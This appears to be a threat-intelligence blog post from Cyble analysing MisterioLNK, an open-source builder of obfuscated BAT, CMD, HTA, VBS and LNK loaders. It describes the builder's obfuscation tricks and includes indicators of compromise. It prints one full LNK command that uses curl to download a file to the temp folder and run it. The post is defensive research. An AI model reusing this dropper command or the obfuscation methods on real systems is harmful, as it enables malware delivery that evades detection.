CybleBlogs Latest 1200 × 600 px 1

Cyble Research and Intelligence Labs (CRIL) has uncovered a new, previously undetected loader builder known as “MisterioLNK.” This discovery follows our earlier analysis of Quantum Software, another LNK file-based builder that has been gaining traction in the cyber landscape. MisterioLNK, available on GitHub, presents a significant challenge to security defenses, as files generated by this tool currently exhibit minimal or zero detection rates by conventional security systems.

As described on GitHub, MisterioLNK is an open-source loader builder that leverages Windows script engines to execute malicious payloads while employing obfuscation as well. It is crafted to operate discreetly, downloading files into temporary directories before launching them, thereby enhancing its evasive capabilities and making detection by traditional security measures difficult.

Key features of MisterioLNK include support for five loader methods—HTA, BAT, CMD, VBS, and LNK— as well as three obfuscation methods specifically for VBS, CMD, and BAT, with plans to add support for HTA obfuscation soon. Additionally, the tool supports customizing the icon of LNK files.

The project is currently in its beta phase, and the author has cautioned that bugs and issues may exist. They encourage users to report any problems via the GitHub Issues page. Furthermore, the author disclaims any responsibility for illegal activities conducted using this software, emphasizing that users must ensure their actions comply with relevant laws and regulations. The figure below shows the GitHub post by the developer.

Figure 1 – GitHub Page for MisterioLNK

Threat Actors (TAs) have started utilizing the MisterioLNK loader builder to generate obfuscated files for deploying malware, such as Remcos RAT, DC RAT, BlankStealer, and even Cobalt Strike Beacons. Alarmingly, these loaders are largely evading detection, with many remaining undetected by most security vendors.

Figure 2 – Detection of malicious files generated by MisterioLNK Builder (Source: Virus Total)

For our research, we generated all combinations of the loader files to evaluate their detection capabilities. The samples created using the MisterioLNK builder revealed that out of six files, only one was detected with 16 detections, two files had one detection each, and three files showed zero detections. While security vendors are successfully detecting LNK and Obfuscated VBS loaders produced by this builder, the detection rates for BAT, CMD, HTA, and VBS loader files remain low, as shown in the figure below.

Figure 3 – POC sample detection

Technical Details

Misterio.exe, a .NET-based tool, consists of two primary modules: a loader builder and an obfuscator. The builder accepts a URL hosting a malicious second-stage payload and generates BAT, CMD, HTA, LNK, or VBS files based on the user’s selection. The generated files are designed to connect to the URL, download the payload, and execute it. Additionally, the builder can obfuscate BAT, CMD, and VBS loader files while allowing custom icons to be added. The figure below illustrates the Misterio Dropper.

Figure 4 – Misterio – Dropper Builder

BAT/CMD Loader and Obfuscator

The BAT/CMD loader generated by the builder is designed to download files from specified URLs using the `curl` command, followed by executing the downloaded files. The resulting script is saved with a custom file icon for enhanced deception. When obfuscation is enabled, the script undergoes an additional layer of concealment.

The obfuscation module uses a technique that inserts random strings between characters in the batch code. It processes each line of the script by appending random strings, enclosed in percent signs (%), to characters that are not already within percent signs. This approach introduces seemingly random data into the code to confuse static analysis tools while still allowing the script to run without issues. Additionally, a comment line is added at the start of the script, indicating that it was processed by “MisterioLNK.”

Figure 5 – BAT/CMD Loaders

HTA Loader:

The HTA (HTML Application) loader generated by the builder utilizes JavaScript and ActiveX objects to execute commands for downloading and running files. While the obfuscation feature for HTA files is currently inactive, it could be implemented in the future. This approach creates an HTML file with embedded script content designed to execute seamlessly upon launch.

Figure 6 – HTA Loader

VBS Loader and Obfuscator:

The VBS Loader leverages a shell object to execute commands for downloading and running the target file. It supports obfuscation to enhance its stealth capabilities. The obfuscation process converts each character of the VBScript into its ASCII code representation using the `Chr()` function, resulting in a series of concatenated `Chr()` calls that reconstruct the original characters when executed. The obfuscated script is then encapsulated within an `Execute()` function, which evaluates and runs the concealed code. This approach effectively obscures the script’s logic, making it difficult for static analysis tools to interpret.

Figure 7 – VBS Loader

LNK Loader Builder:

The tool creates a shortcut file (.lnk) that, upon execution, triggers a command to download and run the target file. It also supports setting a custom icon for the LNK file to enhance its disguise. The target command created by the link builder is “C:Windowssystem32cmd.exe /c mode 15,1 & curl https://live.sysinternals.com/du.exe -o %temp%ntvy4adp.exe & start /b %temp%ntvy4adp.exe”. The figure below shows the properties of the LNK file.

Figure 8 – Properties of LNK File created by LNK Loader Builder

Together, these modules form a powerful toolkit for generating and concealing scripts that can deliver and execute payloads with minimal detection. Their design emphasizes flexibility, adaptability, and evasion, making them potent tools in the context of threat development while also highlighting the potential risks if misused.

Conclusion

MisterioLNK is a versatile loader builder designed to create and conceal scripts that download and execute payloads using various Windows script engines. With support for multiple file formats (BAT, CMD, HTA, VBS, and LNK) and advanced obfuscation techniques, MisterioLNK effectively evades detection by traditional security tools. While currently in beta, its adaptability and focus on evasion make it a significant threat in the cybersecurity landscape. The project’s open-source nature and disclaimers about legal responsibility highlight the potential for misuse.

Our Recommendations

  • Implement security solutions that can recognize and detect the specific obfuscation patterns and script formats generated by MisterioLNK Builder.

  • Use software restriction policies or application whitelisting to limit the execution of unauthorized scripts and reduce the attack surface for loaders like MisterioLNK.

  • Focus on behavioral detection strategies to identify suspicious activities, like the use of scripting engines to download and execute files, regardless of obfuscation.

  • Educate users about the risks associated with executing files from unknown or untrusted sources, emphasizing the dangers of seemingly benign shortcut files (.lnk).

MITRE ATT&CK® Techniques

Tactic  Technique Procedure
Execution (TA0002) User Execution: Malicious File (T1204.002) MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload, typically by tricking users into running the loader file.
Execution (TA0002) Command and Scripting Interpreter (T1059) Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system.
Execution (TA0002) Command and Scripting Interpreter: Visual Basic (T1059.005) Deploys obfuscated VBScript files that execute commands to download and run additional payloads.
Execution (TA0002) Command and Scripting Interpreter: Visual Basic (T1059.003) Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution.
Defence Evasion (TA0005) Masquerading: Masquerade File Type (T1036.008) Uses LNK files with altered icons to disguise the loader as a legitimate file, increasing the likelihood of user interaction.
Defence Evasion (TA0005) Obfuscated Files or Information: Command Obfuscation (T1027.010) MisterioLNK employs obfuscation techniques to hide the content of its scripts, making detection by security tools more difficult.
Defence Evasion (TA0011) Application Layer Protocol: Web Protocols (T1071.001) Uses HTTP/S through the curl command to communicate with remote servers to download payloads.

Indicators Of Compromise

Indicator Indicator Type Description
3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17 SHA256 Remcos
dba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1a353f72dba9ffa2b850 SHA256 Remcos
1be9fcca5fd587accd9dbfa1b6a67a2e6bb58465dd78f775c40f6eb6480bfb5f SHA256 Remcos
64fd11a9befea1310503336a6a8194fca7ab7af291562787c4985d1a1f06b4e1 SHA256 Remcos
0d32a67ee4193520116d2435d1d579811c5ab71c7550d433948eb82e027cc601 SHA256 DC RAT
7f8737e14ca51c1724c0f65a568cefa4d9e1536416ddf89569eab2cce8ae2e01 SHA256 BlankStealer
d2ff200478307f71926fb9b19047f40f86cf4c65cd1e5aee99fa2c91320511c1 SHA256 Cobalt Strike

The post MisterioLNK: The Open-Source Builder Behind Malicious Loaders appeared first on Cyble.